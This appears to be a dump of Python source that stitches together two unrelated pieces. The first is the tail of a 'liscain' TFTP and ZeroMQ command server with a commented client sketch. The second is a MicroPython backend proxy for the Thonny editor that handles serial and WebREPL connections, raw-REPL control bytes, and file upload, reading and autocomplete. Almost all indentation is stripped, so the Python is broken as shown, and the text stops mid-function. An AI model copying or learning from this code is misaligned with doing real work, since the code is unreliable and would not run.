lib.db.initialize(config.get('liscain', 'database'))
tftp_task: threading.Thread = threading.Thread(target=tftp_server, daemon=True)
tftp_task.start()
zmq_context: zmq.Context = zmq.Context(10)
zmq_sock: zmq.socket = zmq_context.socket(zmq.REP)
zmq_sock.bind(config.get('liscain', 'command_socket'))
option82_controller_autoadopt: threading.Thread = threading.Thread(
target=option82_controller.autoadopt_mapping_listener,
args=(zmq_context,),
daemon=True
)
option82_controller_autoadopt.start()
while True:
msg: dict = zmq_sock.recv_json()
zmq_sock.send_json(handle_msg(msg))
if __name__ == '__main__':
main()
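# Client-side sketch (not part of liscain; the socket address is a placeholder):
# commands are plain JSON objects sent over a ZeroMQ REQ socket to the configured
# 'command_socket' endpoint, mirroring the recv_json/send_json loop in main():
#
#   import zmq
#   ctx = zmq.Context()
#   sock = ctx.socket(zmq.REQ)
#   sock.connect('tcp://127.0.0.1:5555')
#   sock.send_json({'cmd': 'list'})
#   print(sock.recv_json())  # list of device dicts, each with a 'cqueue' count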
|
__init__.py
|
import ast
import logging
import io
import os
import platform
import queue
import re
import subprocess
import sys
import textwrap
import threading
import time
import tokenize
import traceback
import webbrowser
from queue import Queue
from textwrap import dedent
from time import sleep
from tkinter import ttk
from thonny.ui_utils import askopenfilename, create_url_label
from typing import Optional
import jedi
import serial.tools.list_ports
from serial import SerialException
from thonny import common, get_runner, get_shell, get_workbench
from thonny.common import (
BackendEvent,
InlineResponse,
MessageFromBackend,
ToplevelCommand,
ToplevelResponse,
)
from thonny.config_ui import ConfigurationPage
from thonny.misc_utils import find_volumes_by_name
from thonny.plugins.backend_config_page import BackendDetailsConfigPage
from thonny.running import BackendProxy
from thonny.ui_utils import SubprocessDialog, create_string_var, show_dialog
EOT = b"\x04"
NORMAL_PROMPT = b">>> "
# first prompt when switching to raw mode (or after soft reboot in raw mode)
FIRST_RAW_PROMPT = b"raw REPL; CTRL-B to exit\r\n>"
RAW_PROMPT = b">"
TIMEOUT = 0.1
EOT_WITH_RAW_PROMPT = "\x04>"
THONNY_START = "<ForThonny>"
THONNY_END = "</ForThonny>"
THONNY_MSG_START = b"\x02"
NEWLINE = "\n"
DEFAULT_WEBREPL_URL = "ws://192.168.4.1:8266/"
# TODO: Current code has some preparations in place to make automatic initial interrupt optional
# It's not so easy, though (initial interrupt also fetches some required info etc)
_AUTOMATIC_INTERRUPT = True
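# Rough outline of the raw-REPL exchange this proxy relies on (see
# _interrupt_to_prompt, _execute_async and _execute_and_get_response below;
# the byte values are the constants defined above):
#
#   write b"\x03"             -> interrupt any running program
#   write b"\x01"             -> enter raw mode; device answers with FIRST_RAW_PROMPT
#   write <script> + b"\x04"  -> submit code; device answers b"OK"
#   read until b"\x04"        -> the script's stdout
#   read until b"\x04>"       -> the script's stderr, followed by the raw prompt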
class MicroPythonProxy(BackendProxy):
def __init__(self, clean):
super().__init__(clean)
self._non_serial_msg_queue = Queue()
self._last_toplevel_command = None
self._has_been_idle = False
self._ctrl_c_notice_has_been_removed = False
self._baudrate = 115200
self._reading_cancelled = False
self._welcome_text = ""
self._discarded_bytes = bytearray()
self._builtins_info = self._get_builtins_info()
# TODO: provide default builtins for script completion
self._builtin_modules = []
self.__idle = False
self._connection = self._create_connection()
if self._connection is not None and (clean or _AUTOMATIC_INTERRUPT):
try:
self._interrupt_to_prompt(clean)
self._builtin_modules = self._fetch_builtin_modules()
except TimeoutError:
read_bytes = bytes(
self._discarded_bytes + self._connection._read_buffer
)
self._show_error_connect_again(
"Could not connect to REPL.\n"
+ "Make sure your device has suitable firmware and is not in bootloader mode!\n"
+ "Bytes read: "
+ str(read_bytes)
+ "\nDisconnecting."
)
self.disconnect()
except:
self.disconnect()
raise
self._start_time = time.time()
def send_command(self, cmd):
if isinstance(cmd, ToplevelCommand):
self._last_toplevel_command = cmd
if cmd.name in ["editor_autocomplete", "cd", "dump_api_info", "lsdevice"]:
# Works even without connection to the board
return super().send_command(cmd)
elif self._connection is None:
return "discard"
elif self.idle:
try:
if not self._connection.buffers_are_empty():
discarded = self._connection.read_all()
self._send_error_to_shell(
"Warning: when issuing %r,\nincoming was not emtpy: %r"
% (cmd, discarded)
)
return super().send_command(cmd)
except SerialException as e:
self._handle_serial_exception(e)
return "discard"
else:
return "postpone"
def send_program_input(self, data: str) -> None:
# TODO: what if there is a previous unused data waiting
assert self._connection.outgoing_is_empty()
assert data.endswith("\n")
if not data.endswith("\r\n"):
    data = data[:-1] + "\r\n"
data = data.encode("utf-8")
try:
self._connection.write(data)
# Try to consume the echo
try:
echo = self._connection.read(len(data))
except queue.Empty:
# leave it.
logging.warning("Timeout when reading echo")
return
if echo != data:
# because of autoreload? timing problems? interruption?
# Leave it.
logging.warning("Unexpected echo. Expected %s, got %s" % (data, echo))
self._connection.unread(echo)
except SerialException as e:
self._handle_serial_exception(e)
def fetch_next_message(self):
if not self._non_serial_msg_queue.empty():
msg = self._non_serial_msg_queue.get_nowait()
elif self._connection is not None:
# Provide guidance for Ctrl-C
if time.time() - self._start_time > 0.5:
if not self._has_been_idle:
"""TODO: get_shell().set_notice("Use Ctrl-C to interrupt the program and/or enter the REPL")"""
else:
if not self._ctrl_c_notice_has_been_removed:
"""TODO: get_shell().set_notice(None)"""
self._ctrl_c_notice_has_been_removed = True
# TODO: fetch required info if automatic interrupt is disabled
# get the message
try:
msg = self._read_next_serial_message()
# if msg:
# print("GOT", msg)
except SerialException as e:
self._handle_serial_exception(e)
return None
else:
msg = None
return self.transform_message(msg)
def interrupt(self):
if self._connection is None:
return
try:
self.idle = False
self._connection.reset_output_buffer()
self._connection.write(b"\x03")
# Wait a bit to avoid the situation where part of the prompt will
# be treated as output and the whole prompt is not detected.
# (Happened with Calliope)
sleep(0.1)
except SerialException as e:
self._handle_serial_exception(e)
def destroy(self):
self.disconnect()
def disconnect(self):
if self._connection is not None:
try:
self._connection.close()
self._send_text_to_shell(
"\n\nConnection closed.\nSelect Run → Stop/Restart or press Ctrl+F2 to connect again.",
"stdout",
)
except Exception as e:
logging.exception("Problem when closing serial")
self._send_error_to_shell(
"Problem when closing serial connection: " + str(e)
)
self._connection = None
def is_connected(self):
return self._connection is not None
def is_functional(self):
return self.is_connected()
def _create_connection(self):
port = get_workbench().get_option(self.backend_name + ".port")
if port == "webrepl":
return self._create_webrepl_connection()
else:
return self._create_serial_connection(port)
def _create_serial_connection(self, port):
if port is None or port == "None":
self._send_text_to_shell(
'Not connected. Choose "Tools → Options → Backend" to change.', "stdout"
)
return None
if port == "auto":
potential = self._detect_potential_ports()
if len(potential) == 1:
port = potential[0][0]
else:
message = dedent(
"""\
Couldn't find the device automatically.
Check the connection (making sure the device is not in bootloader mode)
or choose "Tools → Options → Backend" to select the port manually."""
)
if len(potential) > 1:
_, descriptions = zip(*potential)
message += "\n\nLikely candidates are:\n * " + "\n * ".join(
descriptions
)
self._show_error_connect_again(message)
return None
try:
return SerialConnection(port, baudrate=self._baudrate)
except SerialException as error:
traceback.print_exc()
message = "Unable to connect to " + port + "\n" + "Error: " + str(error)
# TODO: check if these error codes also apply to Linux and Mac
if error.errno == 13 and platform.system() == "Linux":
# TODO: check if user already has this group
message += "\n\n" + dedent(
"""\
Try adding yourself to the 'dialout' group:
> sudo usermod -a -G dialout <username>
(NB! This needs to be followed by reboot or logging out and logging in again!)"""
)
elif "PermissionError" in message:
message += "\n\n" + dedent(
"""\
If you have serial connection to the device from another program,
then disconnect it there."""
)
elif error.errno == 16:
message += "\n\n" + "Try restarting the device."
self._show_error_connect_again(message)
return None
def _create_webrepl_connection(self):
url = get_workbench().get_option(self.backend_name + ".webrepl_url")
password = get_workbench().get_option(self.backend_name + ".webrepl_password")
print("URL", url)
try:
conn = WebReplConnection(url, password)
except:
e_type, e_value, _ = sys.exc_info()
self._send_error_to_shell(
"Could not connect to "
+ url
+ "\nError: "
+ "\n".join(traceback.format_exception_only(e_type, e_value))
)
return None
conn.read_until([b"WebREPL connected\r\n"])
return conn
def _show_error_connect_again(self, msg):
self._send_error_to_shell(
msg
+ "\n\nCheck the configuration, select Run → Stop/Restart or press Ctrl+F2 to try again."
+ "\n(On some occasions it helps to wait before trying again.)"
)
def _detect_potential_ports(self):
all_ports = list_serial_ports()
"""
for p in all_ports:
print(p.description,
p.device,
None if p.vid is None else hex(p.vid),
None if p.pid is None else hex(p.pid),
)
"""
return [
(p.device, p.description)
for p in all_ports
if (p.vid, p.pid) in self.known_usb_vids_pids
or p.description in self.known_port_descriptions
or ("USB" in p.description and "serial" in p.description.lower())
or "UART" in p.description
or "DAPLink" in p.description
]
@property
def idle(self):
return self.__idle
@idle.setter
def idle(self, value):
if self.__idle != value:
logging.debug("Serial idle %s => %s", self.__idle, value)
self.__idle = value
if value:
self._has_been_idle = True
def _fetch_builtin_modules(self):
assert self.idle
out, err = self._execute_and_get_response("help('modules')")
assert err == b"", "Error was: %r" % err
modules_str = (
out.decode("utf-8")
.replace("Plus any modules on the filesystem", "")
.replace("/__init__", "")
.replace("/", ".")
)
return modules_str.split()
def _fetch_uname(self):
assert self.idle
res = self._execute_and_parse_value(
"import os as __os_; print(repr(tuple(__os_.uname()))); del __os_"
)
return {
"sysname": res[0],
"nodename": res[1],
"release": res[2],
"version": res[3],
"machine": res[4],
}
def _interrupt_to_prompt(self, clean, timeout=8):
assert self._connection is not None
timer = TimeHelper(timeout)
# NB! Sometimes disconnecting and reconnecting (on macOS?)
# too quickly causes anomalies. See CalliopeMiniProxy for more details
for delay in [0.05, 0.5, 2.0, 3.0]:
# Interrupt several times, because with some drivers first interrupts seem to vanish
self._connection.reset_output_buffer()
self._connection.write(b"\x03") # interrupt
self._connection.write(b"\x01") # raw mode
sleep(delay)
self._discarded_bytes += self._connection.read_all()
if self._discarded_bytes.endswith(
FIRST_RAW_PROMPT
) or self._discarded_bytes.endswith(b"\r\n>"):
break
else:
raise TimeoutError("Can't get to raw prompt")
self._welcome_text = self._get_welcome_text_in_raw_mode(timer.time_left)
if clean:
self._clean_environment_during_startup(timer.time_left)
self._finalize_repl()
# report ready
self._non_serial_msg_queue.put(
ToplevelResponse(welcome_text=self._welcome_text.strip())
)
self.idle = True
def _clean_environment_during_startup(self, time_left):
# In MP Ctrl+D doesn't run user code, in CP it does
self._connection.write(b"\x04")
self._discarded_bytes = self._connection.read_until(
[FIRST_RAW_PROMPT, RAW_PROMPT], time_left
)
def _get_welcome_text_in_raw_mode(self, timeout):
timer = TimeHelper(timeout)
# get welcome text with Ctrl+B
self._connection.write(b"\x02")
welcome_text = (
self._connection.read_until(NORMAL_PROMPT, timer.time_left)
.strip(b"\r\n >")
.decode("utf-8", "replace")
)
if os.name != "nt":
welcome_text = welcome_text.replace("\r\n", "\n")
# Go back to raw prompt
self._connection.write(b"\x01")
self._connection.read_until((FIRST_RAW_PROMPT, b"\x04>"), timer.time_left)
return welcome_text + " [backend=" + self.get_backend_name() + "]"
def _finalize_repl(self):
pass
def _soft_reboot_and_run_main(self):
if self._connection is None:
return
if not self.idle:
# TODO: ignore??
# self._connection.write(b"\r\x03")
self.interrupt()
get_runner()._set_state("running")
self.idle = False
# Need to go to normal mode. MP doesn't run user code in raw mode
# (CP does, but it doesn't hurt to do it there as well)
self._connection.write(b"\x02")
self._connection.read_until(NORMAL_PROMPT)
self._connection.write(b"\x04")
# Returning to the raw prompt will be handled by
# _read_next_serial_message
def _clear_environment(self):
assert self.idle
# TODO: Ctrl+D in raw repl is perfect for MicroPython
# but on CircuitPython it runs main.py
# TODO: which is better:
# self._execute_async(dedent("""
# for name in globals():
# if not name.startswith("__"):
# del globals()[name]
# """).strip())
# or
out, err = self._execute_and_get_response(
dedent(
"""
globals().clear()
__name__ = '__main__'
"""
).strip()
)
assert out == b""
assert err == b""
def _handle_serial_exception(self, e):
logging.exception("MicroPython serial error")
self._show_error_connect_again("\nLost connection to the device (%s)." % e)
self.idle = False
try:
self._connection.close()
except Exception:
logging.exception("Closing serial")
finally:
self._connection = None
def _execute_async(self, script):
"""Executes given MicroPython script on the device"""
assert self._connection.buffers_are_empty()
# print("----\n",script,"\n---")
command_bytes = script.encode("utf-8")
self._connection.write(command_bytes + b"\x04")
self.idle = False
# fetch confirmation
ok = self._connection.read(2)
assert ok == b"OK", "Expected OK, got %s, followed by %s" % (
ok,
self._connection.read_all(),
)
def _execute_and_get_response(self, script):
self._execute_async(script)
terminator = b"\x04>"
output = self._connection.read_until(terminator)[: -len(terminator)]
self.idle = True
return output.split(b"\x04")
def _execute_and_parse_value(self, script):
out, err = self._execute_and_get_response(script)
if err:
# display script on error
self._send_text_to_shell(script, "stderr")
# TODO: report the error to stderr
assert len(err) == 0, "Error was " + repr(err)
return ast.literal_eval(out.strip().decode("utf-8"))
def _execute_and_expect_empty_response(self, script):
out, err = self._execute_and_get_response(script)
if out or err:
# display script on error
self._send_text_to_shell(script, "stderr")
assert len(out) == 0, "Output was " + repr(out)
assert len(err) == 0, "Error was " + repr(err)
def _cmd_cd(self, cmd):
assert len(cmd.args) == 1
path = cmd.args[0]
if os.path.exists(path):
self._non_serial_msg_queue.put(ToplevelResponse(cwd=path))
else:
self._non_serial_msg_queue.put(
ToplevelResponse(error="Path doesn't exist: %s" % path)
)
def _cmd_Run(self, cmd):
self._clear_environment()
if not hasattr(cmd, "source"):
assert len(cmd.args) == 1
filename = cmd.args[0]
if os.path.isabs(filename):
full_filename = filename
else:
full_filename = os.path.join(get_workbench().get_cwd(), filename)
cmd.script_path = full_filename
with tokenize.open(full_filename) as fp:
source = fp.read()
else:
source = cmd.source
self._execute_async(source)
def _cmd_execute_source(self, cmd):
try:
# Try to parse as expression
ast.parse(cmd.source, mode="eval")
# If it didn't fail then source is an expression
msg_template = """{'message_class':'ToplevelResponse', 'value_info':(id(v), repr(v))}"""
self._execute_async(
"print('\\x04\\x02', [%s for v in [%s]][0])"
% (msg_template, cmd.source.strip())
)
except SyntaxError:
# source is a statement (or invalid syntax)
self._execute_async(cmd.source)
def _cmd_get_globals(self, cmd):
if not get_runner().is_waiting_toplevel_command():
return "postpone"
try:
if cmd.module_name == "__main__":
self._execute_async(
"print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name':'get_globals', 'module_name' : '__main__', 'globals':{x:repr(globals()[x]) for x in globals() if not x.startswith('__')}})"
)
else:
self._execute_async(
dedent(
"""
try:
import %(mod_name)s as __modForGlobs
print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name':'get_globals', 'module_name' : '%(mod_name)s', 'globals':{name : repr(getattr(__modForGlobs, name)) for name in dir(__modForGlobs) if not name.startswith('__')}})
del __modForGlobs
except Exception as e:
print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name':'get_globals', 'module_name' : '%(mod_name)s', 'globals':{}, 'error' : 'Error querying globals:\\n' + str(e)})
"""
% {"mod_name": cmd.module_name}
)
)
except Exception:
self._non_serial_msg_queue.put(
InlineResponse(
command_name="get_globals",
module_name=cmd.module_name,
globals={},
error="Error requesting globals:\\n" + traceback.format_exc(),
)
)
return None
def _cmd_get_dirs_child_data(self, cmd):
if not self._welcome_text:
return "postpone"
if "micro:bit" in self._welcome_text.lower():
return self._cmd_get_dirs_child_data_microbit(cmd)
else:
return self._cmd_get_dirs_child_data_generic(cmd)
    def _cmd_get_dirs_child_data_microbit(self, cmd):
        """Kept here so that micro:bit also works with the generic proxy."""
assert cmd["paths"] == {""}
try:
self._execute_async(
dedent(
"""
try:
import os as __temp_os
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name': 'get_dirs_child_data',
'node_id' : '%(node_id)s',
'dir_separator' : '',
'data': {'' : {name : __temp_os.size(name) for name in __temp_os.listdir()}}
})
del __temp_os
except Exception as e:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name':'get_dirs_child_data',
'node_id' : '%(node_id)s',
'dir_separator' : '',
'data':{},
'error' : 'Error getting file data: ' + str(e)
})
"""
% {"paths": cmd.paths, "node_id": cmd.node_id}
)
)
except Exception:
self._non_serial_msg_queue.put(
InlineResponse(
command_name="get_dirs_child_data",
                    error="Error requesting file data:\n" + traceback.format_exc(),
)
)
return None
def _cmd_get_dirs_child_data_generic(self, cmd):
try:
self._execute_async(
dedent(
"""
try:
import os as __temp_os
# Init all vars, so that they can be deleted
# even if loop makes no iterations
__temp_result = {}
__temp_path = None
__temp_st = None
__temp_children = None
__temp_name = None
__temp_real_path = None
__temp_full = None
for __temp_path in %(paths)r:
__temp_real_path = __temp_path or '/'
__temp_children = {}
for __temp_name in __temp_os.listdir(__temp_real_path):
__temp_full = (__temp_real_path + '/' + __temp_name).replace("//", "/")
# print("processing", __temp_full)
__temp_st = __temp_os.stat(__temp_full)
if __temp_st[0] & 0o170000 == 0o040000:
# directory
__temp_children[__temp_name] = None
else:
__temp_children[__temp_name] = __temp_st[6]
__temp_result[__temp_path] = __temp_children
del __temp_os
del __temp_st
del __temp_children
del __temp_name
del __temp_path
del __temp_full
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name': 'get_dirs_child_data',
'node_id' : '%(node_id)s',
'dir_separator' : '/',
'data': __temp_result
})
del __temp_result
except Exception as e:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name':'get_dirs_child_data',
'dir_separator' : '/',
'node_id' : '%(node_id)s',
'data':{},
'error' : 'Error getting file data: ' + str(e)
})
"""
% {"paths": cmd.paths, "node_id": cmd.node_id}
)
)
except Exception:
self._non_serial_msg_queue.put(
InlineResponse(
command_name="get_dirs_child_data",
                    error="Error requesting file data:\n" + traceback.format_exc(),
)
)
return None
def _cmd_editor_autocomplete(self, cmd):
# template for the response
msg = InlineResponse(
command_name="editor_autocomplete",
source=cmd.source,
row=cmd.row,
column=cmd.column,
error=None,
)
try:
script = jedi.Script(
cmd.source, cmd.row, cmd.column, sys_path=[self._get_api_stubs_path()]
)
completions = script.completions()
except Exception:
msg["error"] = "Autocomplete error"
self._non_serial_msg_queue.put(msg)
return
msg["completions"] = self.filter_completions(completions)
self._non_serial_msg_queue.put(msg)
def filter_completions(self, completions):
# filter out completions not applicable to MicroPython
result = []
for completion in completions:
if completion.name.startswith("__"):
continue
parent_name = completion.parent().name
name = completion.name
root = completion.full_name.split(".")[0]
# jedi proposes names from CPython builtins
if root in self._builtins_info and name not in self._builtins_info[root]:
continue
if parent_name == "builtins" and name not in self._builtins_info:
continue
result.append({"name": name, "complete": completion.complete})
return result
def _cmd_shell_autocomplete(self, cmd):
source = cmd.source
# TODO: combine dynamic results and jedi results
if source.strip().startswith("import ") or source.strip().startswith("from "):
# this needs the power of jedi
msg = InlineResponse(
command_name="shell_autocomplete", source=cmd.source, error=None
)
try:
# at the moment I'm assuming source is the code before cursor, not whole input
lines = source.split("\n")
script = jedi.Script(
source,
len(lines),
len(lines[-1]),
sys_path=[self._get_api_stubs_path()],
)
completions = script.completions()
msg["completions"] = self.filter_completions(completions)
except Exception:
msg["error"] = "Autocomplete error"
self._non_serial_msg_queue.put(msg)
else:
# use live data
regex = re.search(
r"(\w+\.)*(\w+)?$", source
) # https://github.com/takluyver/ubit_kernel/blob/master/ubit_kernel/kernel.py
if regex:
n = regex.group()
# the response format is not the same as expected by the gui
# but it will be transformed later
if "." in n:
obj, n = n.rsplit(".", 1)
self._execute_async(
"print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name': 'shell_autocomplete', 'match':"
+ repr(n)
+ ", 'source':"
+ repr(source)
+ ", 'names':dir("
+ obj
+ ")})"
)
else:
self._execute_async(
"print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name': 'shell_autocomplete', 'match':"
+ repr(n)
+ ", 'source':"
+ repr(source)
+ ", 'names':dir()})"
)
def _cmd_dump_api_info(self, cmd):
"For use during development of the plug-in"
try:
self._execute_and_expect_empty_response(
dedent(
"""
def __print_object_atts(obj):
import gc
result = []
errors = []
for name in dir(obj):
try:
val = getattr(obj, name)
result.append((name, repr(val), repr(type(val))))
except BaseException as e:
errors.append("Couldn't get attr '%s' from object '%r', Err: %r" % (name, obj, e))
print((result, errors))
gc.collect()
"""
)
)
for module_name in sorted(self._fetch_builtin_modules()):
if (
not module_name.startswith("_")
# and not module_name.startswith("ada")
# and not module_name == "builtins"
):
# self._send_text_to_shell("Dumping " + module_name + "\n", "stdout")
file_name = os.path.join(
self._get_api_stubs_path(),
module_name.replace(".", "/") + ".py",
)
self._dump_module_stubs(module_name, file_name)
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
def _dump_module_stubs(self, module_name, file_name):
_, err = self._execute_and_get_response("import {0}".format(module_name))
if err:
print("FAILED IMPORTING MODULE:", module_name, "\nErr: " + repr(err))
return
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with io.open(file_name, "w", encoding="utf-8", newline="\n") as fp:
if module_name not in [
"webrepl",
"_webrepl",
"gc",
"http_client",
"http_client_ssl",
"http_server",
"framebuf",
"example_pub_button",
"flashbdev",
]:
self._dump_object_stubs(fp, module_name, "")
_, err = self._execute_and_get_response("del {0}".format(module_name))
def _dump_object_stubs(self, fp, object_expr, indent):
if object_expr in [
"docs.conf",
"pulseio.PWMOut",
"adafruit_hid",
"upysh",
# "webrepl",
# "gc",
# "http_client",
# "http_server",
]:
print("SKIPPING problematic name:", object_expr)
return
print("DUMPING", indent, object_expr)
items, errors = self._execute_and_parse_value(
"__print_object_atts({0})".format(object_expr)
)
if errors:
print("ERRORS", errors)
for name, rep, typ in sorted(items, key=lambda x: x[0]):
if name.startswith("__"):
continue
print("DUMPING", indent, object_expr, name)
self._send_text_to_shell(" * " + name + " : " + typ, "stdout")
if typ in ["<class 'function'>", "<class 'bound_method'>"]:
fp.write(indent + "def " + name + "():\n")
fp.write(indent + " pass\n\n")
elif typ in ["<class 'str'>", "<class 'int'>", "<class 'float'>"]:
fp.write(indent + name + " = " + rep + "\n")
elif typ == "<class 'type'>" and indent == "":
# full expansion only on toplevel
fp.write("\n")
fp.write(indent + "class " + name + ":\n") # What about superclass?
fp.write(indent + " ''\n")
self._dump_object_stubs(
fp, "{0}.{1}".format(object_expr, name), indent + " "
)
else:
# keep only the name
fp.write(indent + name + " = None\n")
def _cmd_cat(self, cmd):
if len(cmd.args) != 1:
self._send_error_to_shell("Command requires one argument")
return
source = cmd.args[0]
mount = self._get_fs_mount()
if mount is None:
self._cat_via_serial(source)
else:
source = os.path.join(mount, source.strip("/"))
self._cat_via_mount(source)
def _cmd_lsdevice(self, cmd):
try:
items = self._list_files()
out = "\n".join(items) + "\n"
self._send_text_to_shell(out, "stdout")
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
def _cmd_upload(self, cmd):
# Target is interpreted relative to the root
if len(cmd.args) == 1:
source = cmd.args[0]
# target is at root
target = os.path.basename(source)
elif len(cmd.args) == 2:
source = cmd.args[0]
target = cmd.args[1]
else:
# TODO: test this case
raise RuntimeError("Command requires 1 or 2 arguments")
if not os.path.isabs(source):
source = os.path.join(get_workbench().get_cwd(), source)
if not os.path.isfile(source):
raise IOError("No such file: %s" % source)
target = target.replace("\\", "/")
# Only prepend slash if it is known that device supports directories
# (it's probably safe to omit slash anyway)
if self._supports_directories() and not target.startswith("/"):
target = "/" + target
try:
self._check_and_upload(source, target)
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
# TODO: Output confirmation ? (together with file size)
# Or should the confirmation be given in terms of mount path?
def _cmd_write_file(self, cmd):
BUFFER_SIZE = 32
data = cmd["content_bytes"]
self._execute_and_expect_empty_response(
dedent(
"""
__temp_path = '{path}'
__temp_f = open(__temp_path, 'wb')
__temp_written = 0
"""
).format(path=cmd["path"])
)
size = len(data)
for i in range(0, size, BUFFER_SIZE):
chunk_size = min(BUFFER_SIZE, size - i)
chunk = data[i : i + chunk_size]
self._execute_and_expect_empty_response(
"__temp_written += __temp_f.write({chunk!r})".format(chunk=chunk)
)
self._execute_async(
dedent(
"""
try:
__temp_f.close()
del __temp_f
if __temp_written != <<size>>:
raise RuntimeError("Wrote %d bytes out of %d" % (__temp_written, <<size>>))
del __temp_written
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name': 'write_file',
'path' : __temp_path
})
except Exception as e:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name':'write_file',
'path' : __temp_path,
'error' : 'Error saving file content: ' + str(e)
})
del __temp_path
"""
).replace("<<size>>", str(size))
)
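    # Editorial note: the script above receives the file in BUFFER_SIZE-byte
    # chunks because each chunk is embedded as a bytes literal in a raw-REPL
    # command; the final script verifies that __temp_written matches the
    # expected size before reporting success.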
def _cmd_read_file(self, cmd):
print("READING", cmd)
try:
self._execute_async(
dedent(
"""
try:
__temp_path = '%(path)s'
with open(__temp_path, 'rb') as __temp_fp:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name': 'read_file',
'path' : __temp_path,
'content_bytes': __temp_fp.read()
})
del __temp_fp
del __temp_path
except Exception as e:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name':'read_file',
'path' : __temp_path,
'content_bytes': b'',
'error' : 'Error getting file content: ' + str(e)
})
"""
)
% cmd
)
except Exception:
self._non_serial_msg_queue.put(
InlineResponse(
command_name="read_file",
path=cmd.path,
content_bytes=b"",
                    error="Error requesting file content:\n" + traceback.format_exc(),
)
)
def _check_and_upload(self, source, target):
        # If the target is a .py file, warn when the source has syntax errors.
        # Note that this is an incomplete check -- if the local Python version
        # is newer than 3.5, it may accept source which still gives syntax
        # errors on MicroPython.
if target.endswith(".py"):
with tokenize.open(source) as fp:
src = fp.read()
try:
ast.parse(src, source)
except SyntaxError as e:
self._send_error_to_shell(
"%s has syntax errors:\n%s\n\nFile will not be uploaded."
% (source, e)
)
return
try:
self._upload(source, target)
except Exception:
self._send_error_to_shell(traceback.format_exc())
def _upload(self, source, target):
mount = self._get_fs_mount()
if mount is None:
self._upload_via_serial(source, target)
else:
virtual_path = os.path.join(mount, target.strip("/"))
self._upload_via_mount(source, virtual_path)
def _upload_via_serial(self, source, target):
assert self.idle
with open(source, "rb") as local:
content = local.read()
self._execute_and_expect_empty_response("__upf = open(%r, 'wb')" % target)
BLOCK_SIZE = 64
for i in range(0, len(content), BLOCK_SIZE):
self._execute_and_expect_empty_response(
"__upf.write(%r)" % content[i : i + BLOCK_SIZE]
)
self._execute_and_expect_empty_response("__upf.close()")
self._execute_and_expect_empty_response("del __upf")
def _upload_via_mount(self, source, target):
with open(source, "rb") as fp:
content = fp.read()
try:
with open(target, "wb") as fp:
fp.write(content)
                # Force the write through to the device to avoid data corruption
                # when the user resets or unplugs the device
os.fsync(fp)
except OSError as e:
self._report_upload_via_mount_error(source, target, e)
return
def _report_upload_via_mount_error(self, source, target, error):
self._send_error_to_shell(
"Couldn't write to %s\nOriginal error: %s\n\nIf the target directory exists then it may be corrupted."
% (target, error)
)
def _cat_via_serial(self, source):
try:
out, err = self._execute_and_get_response(
dedent(
"""
with open(%r, "r") as fp:
print(fp.read())
"""
% source
).strip()
)
if out:
self._send_text_to_shell(
out.decode("utf-8", errors="replace"), "stdout"
)
if err:
self._send_text_to_shell(
err.decode("utf-8", errors="replace"), "stderr"
)
except Exception:
self._send_error_to_shell(traceback.format_exc())
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
def _cat_via_mount(self, source):
try:
with open(source, "r", encoding="UTF-8", errors="replace") as fp:
self._send_text_to_shell(fp.read(), "stdout")
except Exception:
self._send_error_to_shell(traceback.format_exc())
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
def _list_files(self):
mount = self._get_fs_mount()
if mount is None:
return self._execute_and_parse_value(
"import os as __os_; print(__os_.listdir()); del __os_"
)
else:
return os.listdir(mount)
def _supports_directories(self):
if "micro:bit" in self._welcome_text.lower():
return False
else:
return True
def _get_fs_mount_name(self):
return None
def _get_bootloader_mount_name(self):
return None
def _get_fs_mount(self):
if self._get_fs_mount_name() is None:
return None
else:
candidates = find_volumes_by_name(self._get_fs_mount_name())
if len(candidates) == 0:
raise RuntimeError("Could not find volume " + self._get_fs_mount_name())
elif len(candidates) > 1:
raise RuntimeError(
"Found several possible mount points: %s" % candidates
)
else:
return candidates[0]
def _read_next_serial_message(self) -> Optional[MessageFromBackend]:
new_bytes = self._connection.read_all()
if len(new_bytes) == 0:
return None
# TODO: Handle the case where part of the prompt was already published in previous message
# Look for the first marker (EOT anywhere or NORMAL_PROMPT in the end of the seq)
match = re.search(
b"("
+ EOT
+ b"|"
+ NORMAL_PROMPT
+ b"$" # Consider prompts only if they're at the end of output
+ b"|"
+ FIRST_RAW_PROMPT
+ b"$"
+ b")",
new_bytes,
)
if match is None:
# normal output (possibly partial)
return self._read_output_message(new_bytes, False)
elif match.start() > 0:
# starts with block of normal output
self._connection.unread(new_bytes[match.start() :])
return self._read_output_message(new_bytes[: match.start()], True)
elif match.group() == FIRST_RAW_PROMPT:
assert new_bytes == FIRST_RAW_PROMPT
self.idle = True
return ToplevelResponse()
elif match.group() == NORMAL_PROMPT:
# Go to raw prompt
assert new_bytes == NORMAL_PROMPT, "Got %s" % new_bytes
return self._enter_raw_repl(True)
else:
assert match.group() == EOT
assert match.start() == 0
if len(new_bytes) == 1:
# can't decide anything yet
self._connection.unread(new_bytes)
return None
elif new_bytes[1:2] == RAW_PROMPT:
# must be end of the response to a non-Thonny command
# Only treat as raw prompt if it ends the output
if new_bytes[1:] == RAW_PROMPT:
assert (
self._connection.incoming_is_empty()
                    )  # TODO: what about Ctrl-? ?
self.idle = True
return ToplevelResponse()
else:
# Looks like the prompt was discarded by a soft reboot (or some other reason?)
# hide it and forget it
self._connection.unread(new_bytes[2:])
return None
elif new_bytes[1:2] == THONNY_MSG_START:
# must be followed by empty error block and raw prompt
# read the message, following exception block and next prompt
terminator = b"\r\n" + EOT + EOT + RAW_PROMPT
term_loc = new_bytes.find(terminator)
if term_loc == -1:
